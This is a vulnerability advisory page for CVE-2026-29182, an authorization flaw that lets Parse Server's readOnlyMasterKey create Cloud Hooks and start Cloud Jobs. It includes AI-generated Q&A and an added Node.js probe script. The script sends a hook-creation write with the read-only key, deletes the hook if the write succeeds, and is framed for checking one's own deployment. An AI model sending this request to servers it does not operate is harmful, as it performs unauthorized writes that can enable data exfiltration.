CVE-2026-29182
Status: Received - Intake
Privilege Escalation via readOnlyMasterKey in Parse Server

Publication date: 2026-03-06

Last updated on: 2026-03-10

Assigner: GitHub, Inc.

Description
Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 8.6.4 and 9.4.1-alpha.3, Parse Server's readOnlyMasterKey option grants master-level read privileges and is documented to deny all write operations. However, some endpoints incorrectly accept the readOnlyMasterKey for mutating operations. A caller who holds only the readOnlyMasterKey can therefore create, modify, and delete Cloud Hooks and start Cloud Jobs, which can be used for data exfiltration. Any Parse Server deployment that uses the readOnlyMasterKey option is affected. Note that an attacker needs to know the readOnlyMasterKey to exploit this vulnerability. This issue has been patched in versions 8.6.4 and 9.4.1-alpha.3.
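As an added verification check (not part of this advisory and not Parse Server project code): the script below sends the one write the fix must refuse, a Cloud Hook creation authenticated only with the readOnlyMasterKey, to the documented Parse REST hooks endpoint (POST /hooks/functions) and classifies the response. It assumes Node 18+ for the global fetch, a probe hook name and URL chosen here for illustration, and that a patched server answers the write with HTTP 401 or 403; if the server accepts the write instead, the script removes the hook it just created using the same key (Parse deletes a hook with a PUT carrying {"__op": "Delete"}). Run it only against deployments you operate.

```javascript
// Added example: does this Parse Server deployment still let the
// readOnlyMasterKey perform a mutating Cloud Hook operation (CVE-2026-29182)?
// Not Parse Server project code. Requires Node 18+ (global fetch).

const PROBE_FUNCTION = 'cve_2026_29182_probe';           // hypothetical hook name
const PROBE_URL = 'https://hook.example.invalid/probe';  // .invalid never resolves

// Build the request a patched server must reject: a hook *creation* (a write)
// authenticated only with the read-only master key. Path and headers follow
// the documented Parse REST API; nothing else about the deployment is assumed.
function buildProbeRequest(serverUrl, appId, readOnlyMasterKey) {
  return {
    url: `${serverUrl.replace(/\/+$/, '')}/hooks/functions`,
    init: {
      method: 'POST',
      headers: {
        'X-Parse-Application-Id': appId,
        'X-Parse-Master-Key': readOnlyMasterKey,   // read-only key sent as master key
        'Content-Type': 'application/json',
      },
      body: JSON.stringify({ functionName: PROBE_FUNCTION, url: PROBE_URL }),
    },
  };
}

// 2xx means the write went through with read-only credentials: vulnerable.
// 401/403 is the refusal a patched server should give (assumption).
// Anything else is inconclusive (e.g. 404 if the hooks router is disabled).
function classifyResponse(status) {
  if (status >= 200 && status < 300) return 'vulnerable';
  if (status === 401 || status === 403) return 'rejected';
  return 'inconclusive';
}

async function probeReadOnlyMasterKey(serverUrl, appId, readOnlyMasterKey, fetchImpl = fetch) {
  const { url, init } = buildProbeRequest(serverUrl, appId, readOnlyMasterKey);
  const res = await fetchImpl(url, init);
  const verdict = classifyResponse(res.status);
  let cleanedUp = false;
  if (verdict === 'vulnerable') {
    // The hook now exists on the server; remove it with the key that was just
    // accepted so the probe leaves no artefact behind.
    const del = await fetchImpl(`${url}/${PROBE_FUNCTION}`, {
      ...init, method: 'PUT', body: JSON.stringify({ __op: 'Delete' }),
    });
    cleanedUp = del.status >= 200 && del.status < 300;
  }
  return { verdict, status: res.status, cleanedUp };
}

// CLI usage: node probe.js <serverUrl> <appId> <readOnlyMasterKey>
// e.g.       node probe.js https://parse.example.com/parse myAppId myReadOnlyKey
if (process.argv.length === 5) {
  const [serverUrl, appId, key] = process.argv.slice(2);
  probeReadOnlyMasterKey(serverUrl, appId, key)
    .then(r => console.log(JSON.stringify(r)))
    .catch(e => { console.error(e.message); process.exit(2); });
}
```

A verdict of "vulnerable" with cleanedUp false means the probe hook is still registered and should be deleted by hand with the full master key. The probe deliberately exercises only hook creation; starting a Cloud Job, the other write named in the description, requires a job name the deployment actually defines and is better verified after upgrading.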
Meta Information
Generated: 2026-05-07
AI Q&A: 2026-03-06
EPSS Evaluated: 2026-05-05
Affected Vendors & Products
Vendor          Product        Version / Range
parseplatform   parse-server   to 8.6.4 (exc)
parseplatform   parse-server   9.4.1
parseplatform   parse-server   From 9.0.0 (inc) to 9.4.0 (inc)
CWE
CWE-863 (Incorrect Authorization): The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.
AI Powered Q&A
How can this vulnerability be detected on my network or system? Can you suggest some commands?

I don't know


What immediate steps should I take to mitigate this vulnerability?

To mitigate this vulnerability, the primary and recommended step is to upgrade Parse Server to version 8.6.4 or 9.4.1-alpha.3 or later, where the issue has been fixed.

If an immediate upgrade is not possible, restrict access to the readOnlyMasterKey and avoid sharing it with untrusted parties to reduce the risk of exploitation.


Can you explain this vulnerability to me?

CVE-2026-29182 is a vulnerability in Parse Server versions prior to 8.6.4 and 9.4.1-alpha.3 where the readOnlyMasterKey, which is supposed to allow only master-level read access and deny all write operations, is improperly enforced.

Due to this flaw, some endpoints incorrectly accept the readOnlyMasterKey for mutating operations, allowing an attacker who knows this key to create, modify, and delete Cloud Hooks and start Cloud Jobs.

This can be exploited to perform unauthorized write actions, potentially leading to data exfiltration.

The issue was fixed in versions 8.6.4 and 9.4.1-alpha.3 by adding proper authorization checks.


How can this vulnerability impact me?

If you use Parse Server with the readOnlyMasterKey option, this vulnerability allows an attacker who knows the readOnlyMasterKey to perform unauthorized write operations.

  • Create, modify, and delete Cloud Hooks.
  • Start Cloud Jobs.

These actions can be used for data exfiltration and compromise the confidentiality, integrity, and availability of your system.

The vulnerability has a high severity rating with a CVSS v4 base score of 8.6 and can be exploited remotely without user interaction, but requires possession of the readOnlyMasterKey.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

I don't know

